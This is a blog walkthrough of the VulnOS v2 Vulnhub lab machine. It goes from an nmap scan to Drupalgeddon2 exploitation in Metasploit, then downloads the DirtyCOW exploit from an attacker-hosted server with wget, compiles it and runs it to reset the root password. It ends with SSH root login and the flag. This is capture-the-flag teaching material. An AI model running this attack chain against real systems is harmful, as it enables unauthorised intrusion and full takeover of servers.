Open in app

Sign in

Write

Sign in

VulnOS By Vulnhub Walkthrough

Hello guys, welcome back to my walkthrough blog. Let’s get started.

Akash Falaskar
4 min readOct 1, 2023

First, identify the target IP. To do this, use Netdiscover.Once we have the target IP, let’s scan it with Nmap using the following flags:

  • -sC: Scan with default NSE scripts
  • -sV: Get protocol versions
  • -p-: Scan all ports
  • -oN example.txt: Output the results to a file named example.txt
┌─[ghost@windows]─[~]  
└──╼ $nmap -sC -sV -p- -oN vulnos.txt 192.168.0.106  
Nmap scan report for 192.168.0.106  
Host is up (0.00017s latency).  
Not shown: 65532 closed tcp ports (reset)  
PORT STATE SERVICE VERSION  
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.6 (Ubuntu Linux; protocol 2.0)  
| ssh-hostkey:  
| 1024 f54dc8e78bc1b2119524fd0e4c3c3b3b (DSA)  
| 2048 ff19337ac1eeb5d0dc6651daf06efc48 (RSA)  
| 256 aed76fcced4a828be866a5117a115f86 (ECDSA)  
|_ 256 71bc6b7b5602a48ece1c8ea61e3a3794 (ED25519)  
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))  
|_http-title: VulnOSv2  
|_http-server-header: Apache/2.4.7 (Ubuntu)  
6667/tcp open irc ngircd  
MAC Address: 08:00:27:58:90:25 (Oracle VirtualBox virtual NIC)  
Service Info: Host: irc.example.net; OS: Linux; CPE: cpe:/o:linux:linux_kernel

As you can see, the output of Nmap shows that SSH is open and there is a webpage running on the target. Let’s check out the webpage.

The webpage shows that we can find the root flag on this website.

Let’s click on the website and you will see the webpage. On the favicon, you can see that it is a Drupal webpage. We can find the Drupal version in the source of the content page.A remote code execution vulnerability exists within multiple subsystems of Drupal 7.x and 8.x. This potentially allows attackers to exploit multiple attack vectors on a Drupal site Which could result in the site being compromised. This vulnerability is related to Drupal core — Highly critical — Remote Code Execution.So Let’s Fire up Metasploit

msfconsole
search drupal
   #  Name                                           Disclosure Date  Rank       Check  Description
   -  ----                                           ---------------  ----       -----  -----------
   0  exploit/unix/webapp/drupal_coder_exec          2016-07-13       excellent  Yes    Drupal CODER Module Remote Command Execution
   1  exploit/unix/webapp/drupal_drupalgeddon2       2018-03-28       excellent  Yes    Drupal Drupalgeddon 2 Forms API Property Injection
   2  exploit/multi/http/drupal_drupageddon          2014-10-15       excellent  No     Drupal HTTP Parameter Key/Value SQL Injection
   3  auxiliary/gather/drupal_openid_xxe             2012-10-17       normal     Yes    Drupal OpenID External Entity Injection
   4  exploit/unix/webapp/drupal_restws_exec         2016-07-13       excellent  Yes    Drupal RESTWS Module Remote PHP Code Execution
   5  exploit/unix/webapp/drupal_restws_unserialize  2019-02-20       normal     Yes    Drupal RESTful Web Services unserialize() RCE
   6  auxiliary/scanner/http/drupal_views_user_enum  2010-07-02       normal     Yes    Drupal Views Module Users Enumeration
   7  exploit/unix/webapp/php_xmlrpc_eval            2005-06-29       excellent  Yes    PHP XML-RPC Arbitrary Code Execution


set exploit/unix/webapp/drupal_drupalgeddon2
set rhosts <target ip>
set targeturi /jabc
run

Voilà! We found a shell, but we can’t access any of the home directories. There is Webmin and VulnOS installed, so we can go to the /tmp folder and download the Linux Exploit Suggester to identify which exploit to use for this machine.You can find the Linux Exploit Suggester on GitHub and install it on the attacker’s machine.

git clone https://github.com/The-Z-Labs/linux-exploit-suggester.git
cd linux-exploit-suggester

To start a SimpleHTTPServer on our attacker machine, we can run the following command:

sudo python -m SimpleHTTPServer 80

Then, we can go back to MSFconsole.

cd /tmp
wget http://<target-ip>/linux-exploit-suggester.sh
./linux-exploit-suggester.sh
Available information:

Kernel version: 3.13.0
Architecture: i686
Distribution: ubuntu
Distribution version: 14.04
Additional checks (CONFIG_*, sysctl entries, custom Bash commands): performed
Package listing: from current OS

Searching among:

81 kernel space exploits
49 user space exploits

Possible Exploits:

cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe

[+] [CVE-2016-5195] dirtycow

   Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
   Exposure: highly probable
   Tags: debian=7|8,RHEL=5{kernel:2.6.(18|24|33)-*},RHEL=6{kernel:2.6.32-*|3.(0|2|6|8|10).*|2.6.33.9-rt31},RHEL=7{kernel:3.10.0-*|4.2.0-0.21.el7},[ ubuntu=16.04|14.04|12.04 ]
   Download URL: https://www.exploit-db.com/download/40611
   Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh

[+] [CVE-2016-5195] dirtycow 2

   Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
   Exposure: highly probable
   Tags: debian=7|8,RHEL=5|6|7,[ ubuntu=14.04|12.04 ],ubuntu=10.04{kernel:2.6.32-21-generic},ubuntu=16.04{kernel:4.4.0-21-generic}
   Download URL: https://www.exploit-db.com/download/40839
   ext-url: https://www.exploit-db.com/download/40847
   Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh

We found the output of the Linux Exploit Suggester, which suggested 81 kernel space exploits and 49 user space exploits. We will focus on the two user space exploits, specifically the second exploit, DirtyCOW2. We can go to the following URL to download the exploit: https://www.exploit-db.com/download/40847

we can change the exploit name into cow.cpp.

 $ mv 40847.cpp cow.cpp

As usual, we can get the cow.cpp file in the shell.And Compile the code,Follow this command

wget http://<attacker-ip>/cow.cpp
chmod 777 cow.cpp
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow  cow.cpp -lutil
dcow
chmod 777 dcow 
./dcow
Running ...
Received su prompt (Password: )
Root password is:   dirtyCowFun
Enjoy! :-)

As you can see, the exploit can change the root password. So, we can go to the root folder and type the password, or we can go to SSH as root. So, I can go to SSH.

ssh root@192.168.0.106
root@192.168.0.106's password: 
Welcome to Ubuntu 14.04.4 LTS (GNU/Linux 3.13.0-24-generic i686)

 * Documentation:  https://help.ubuntu.com/

  System information as of Sat Sep 30 21:50:00 CEST 2023
  System load: 0.0               Memory usage: 2%   Processes:       66
  Usage of /:  5.8% of 29.91GB   Swap usage:   0%   Users logged in: 0

  => There is 1 zombie process.

  Graph this data and manage this system at:
    https://landscape.canonical.com/

root@VulnOSv2:~# ls
flag.txt
root@VulnOSv2:~# cat flag.txt 
Hello and welcome.
You successfully compromised the company "JABC" and the server completely !!
Congratulations !!!
Hope you enjoyed it.

What do you think of A.I.?

Voilà! We can get root access.

Vulnhub
Drupal
Exploitation
Ctf
Ctf Writeup

--

--

Akash Falaskar

Written by Akash Falaskar

13 Followers

Penetration Tester | Cybersecurity Content Creator,and Writer

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams